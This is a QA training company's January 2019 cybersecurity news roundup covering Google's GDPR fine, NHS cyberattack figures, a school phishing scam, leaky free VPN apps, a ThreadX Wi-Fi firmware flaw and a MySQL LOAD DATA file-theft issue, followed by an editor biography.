Cyber Security Training from QA

Cyber Pulse: Edition 50

Read the latest edition of Cyber Pulse, our roundup of Cyber news.


25 January 2019

Google Fined $57 Million by France on Account of GDPR Offense

The Commission nationale de l'informatique et des libertés (CNIL), which oversees privacy laws related to personal data in France, has slapped a hefty fine of $57 million on Google on Monday. It has come to light that the tech giant failed to include better transparency regarding its user data policies. CNIL told media that Google made it unclear for users to understand on how their data was used for targeted advertising. After the EU General Data Protection Regulation(GDPR) came into effect last year, CNIL has devotedly followed the former in terms of data regulations. GDPR mainly focuses on transparency from data collecting companies in terms of how they use data they collect as well their consent on data sharing. Following its implementation in 2018, companies in and outside EU, have reorganized their businesses to meet GDPR’s standards. Despite Google making changes in its offerings, it was not yet enough to be in accordance with the user data privacy regulations specified under GDPR. The restricted committee of CNIL which oversaw the matter, stated that "the users’ consent is not sufficiently informed". "The information on processing operations for the ads personalization is diluted in several documents and does not enable the user to be aware of their extent," the committee added. Furthermore, the restricted committee observed that the collected consent is neither “specific” nor “unambiguous”.

NHS in Cumbria Victim to More Than 150 Cyberattacks in 5 Years

It appears that the NHS trust in Cumbria, UK has become a major target for cybercriminals in recent years. According to a Freedom Of Information (FOI) report obtained by BBC News, it showed that the institution was subject to more than 150 cyber attacks in the past five years. Specifically, 147 attacks were directed at University Hospitals of Morecambe Bay NHS Trust (UHMBT). These high numbers indicated that the trust was active in terms of incident reporting. Lee Coward, Head of IT at UHMBT told that the Cumbria NHS has a ‘rigorous’ reporting process and made it possible to report higher volumes of identified cyber 'attacks' than other organizations. Coward also mentioned that a significant amount of money had been spent on resources to keep IT systems safe. Iain Stainton, Senior Lecturer for Policing and Criminology at the University of Cumbria, expressed that the attacks were ‘extraordinary’. Stainton also emphasized the fact that the National Cyber Security Centre had an average of 10 attacks per week in the UK. Earlier, the NHS has been criticized for its lackluster attempt to invest more in cybersecurity. It was found that as little as £250 was spent last year. “The average spend on data security training across 159 Trusts surveyed was £5,356 in the last 12 months, but this ranged widely from between £238 and £78,000 with no correlation to the size of Trust, or its location,” found another FOI.

Cybercriminals Target Private School in Newcastle With Phishing

Recently, cybercriminals tried to scam parents of students from a private school to pay the school fees in bitcoin to get a discount in the fees. Royal Grammar School (RGS) in Jesmond, Newcastle was the victim of this latest phishing attack. As a result, the school administration has warned parents to stay away from subsequent fraud emails related to payments. Furthermore, RGS’s headmaster John Fern told the affected families that the scam was reported to the police. The Information Commissioner’s Office (ICO), which investigated the incident told that other schools are also likely to be targeted.“[We are] aware of other phishing type attacks that have been targeted towards schools. Royal Grammar School has made us aware of an incident and we will assess the information provided,” ICO told media. It appears that the spam emails contained spelling, grammatical and punctuation errors. In addition to that, it claimed to offer discounts to those who paid through bitcoins or other cryptocurrencies. “We are aware that parents have received an email claiming you'll receive a 25% discount on fees for passing over details or claiming that you can now pay by bitcoin/cryptocurrency. Please note these are phishing emails and should not be opened or any links clicked. We are currently investigating this breach and information will be passed on to all parents in due course.” told RGS on its website.

Top Free VPN Apps Found Carrying User Privacy Bugs

A huge number of free VPN Android apps in the Google Play Store are found to be at high risk. In a study involving around 150 of the most popular free VPN Android apps, it has been found that almost over a quarter of the VPN apps leaked Domain Name System (DNS) information and failed to protect users. These apps have over 260 million combined installations worldwide. Apart from DNS leakage, the study conducted by Simon Migliano, Metric Labs’ Head of Research at Top10VPN.com, discovered that four VPN apps leaked WebRTC(a real-time communications protocol for browsers) data. Two other apps leaked DNS data, IP addresses and WebRTC data. These 150 apps were also scanned on Google’s VirusTotal site and it was discovered that 27 of these apps flagged as a potential source of malware. Two-third of the apps tested contained user privacy bugs. There were few apps that wanted to use the device’s camera and microphone or send text messages. The only thing all apps did correctly was to establish encrypted VPN connections. However, network testing revealed that over half of the apps suffered performance issues such as packet loss, low bandwidth and excessive buffering. The top ten free VPN apps that were slammed to be at high risk are HotSpotShield Free, SuperVPN, Hi VPN, HotSpotShield Basic, Psiphon Pro, Turbo VPN, VPN Master, Snap VPN, Hola, and Speed VPN. Each of these apps has recorded a download count between 10-50 million. None of these were flagged for malware, but all of them had at least of the core issues: risky permissions, risky functions and DNS leakage.

ThreadX Harbours Serious Bug, Billions of Wi-Fi Enabled Devices

ThreadX RTOS, a popular OS found in almost every consumer electronics device, is believed to have a serious flaw in its firmware. Embedi, a firm which engages in security solutions for electronic devices, has discovered this bug. One of its researchers, Denis Selianin has studied this extensively and has provided a detailed analysis. Marvell Avastar wireless SoC, the chipset series used in Selianin’s study, was analyzed for its firmware which drives the WiFi functionality. A vulnerability lay in the ThreadX component which was recurring frequently. “One of the discovered vulnerabilities was a special case of ThreadX block pool overflow. This vulnerability can be triggered without user interaction during the scanning for available networks. This procedure is launched every 5 minutes regardless of a device being connected to some Wi-Fi network or not. That’s why this bug is so cool and provides an opportunity to exploit devices literally with zero-click interaction at any state of the wireless connection (even when a device isn’t connected to any network).” explained Selianin. The researcher also emphasized another vulnerability, that is applicable to devices with a different ThreadX implementation other than that of Avastar. All put together, these vulnerability can exploit billions of Wi-Fi enabled devices that are generally powered by ThreadX. Selianin suggests that wireless devices have more attack surfaces. Furthermore, device drivers have higher escalation rates from a device to a host processor. As of now, this vulnerability is not mitigated completely in affected devices and ThreadX has yet to come with a proper patch.

Minor MySQL Flaw Leaves Confidential Data Out in The Open

A design flaw has been uncovered in the popular open-source RDBMS, MySQL. Multiple sources have reported this issue, which is present in the file transfer process in MySQL. Apparently, an executable statement called ‘LOAD DATA’ that load files from the server can be exploited by attackers to steal files from the system. Reported by Security Affairs, this loophole can be misused by rogue MySQL servers to access client-host data. This means attackers can easily steal private data by simply knowing the file’s path using ‘/proc/self/environ’ file. Interestingly, it is also believed that the MySQL flaw was used by Magecart attackers to deploy malicious code in last year’s attack. Cybersecurity researcher Willem de Groot explains that Adminer -- a PHP tool for MySQL and PostgreSQL databases, is mainly abused by attackers to gain unauthorized access to databases through the flaw. “AFAIK this attack method has not been published before, but in hindsight, I have observed it being used by different Magecart factions at least since October 2018. The vulnerability was subsequently used to inject payment skimmers on several high-profile stores (government & multinationals).” speculated de Groot, when it came to Adminer’s misuse. In addition, this flaw allows attackers to initiate file transfers from servers on top of infecting the database. When using a tool like Adminer for database related activity, users are advised to use an updated version of the tool, as well as protect their databases with measures such as password protection, says de Groot.

 

Visit cyber.qa.com for more information on how QA can help solve the Cyber Security skills gap and subscribe to Cyber Pulse.

 

Useful links

Cyber Pulse: Edition 49

Cyber Pulse: Edition 48

Cyber Pulse: Edition 47

Cyber Pulse: Edition 46

Cyber Pulse: Edition 45

Cyber Pulse: Edition 44

Cyber Pulse: Edition 43

Cyber Pulse: Edition 42

Cyber Pulse: Edition 41

Cyber Pulse: Edition 40

 

Edited and compiled by

 

James Aguilan

James Aguilan

Cyber Security Specialist

James Aguilan currently works as a Cybersecurity Researcher. He has provided upskilling and development to Government Agencies, National Critical Infrastructures and Large Corporations through the simulation of cyber-attacks and forensic investigations workshops. In the past, James worked as a Data Consultant where he advised high profiling clients on how to handle their data in a Civil Litigation or Criminal Investigation. Notably, this includes the largest Merger between two US Powerhouse Conglomerate, a deal worth $87 billion. Additionally, he has also served as a Cybersecurity Consultant where he would Respond to Incidents and Perform Full Forensic Investigations. James holds a first-class honour in Computer Forensics and is actively working towards a Masters in Network Security and Penetration Testing.
Talk to our learning experts

Talk to our team of learning experts

Every business has different learning needs. QA has over 30 years of experience in combining the highest quality training with the most comprehensive range of learning services, ensuring the very best fit for your organisation.

Get in touch with our learning experts to talk about how we can help.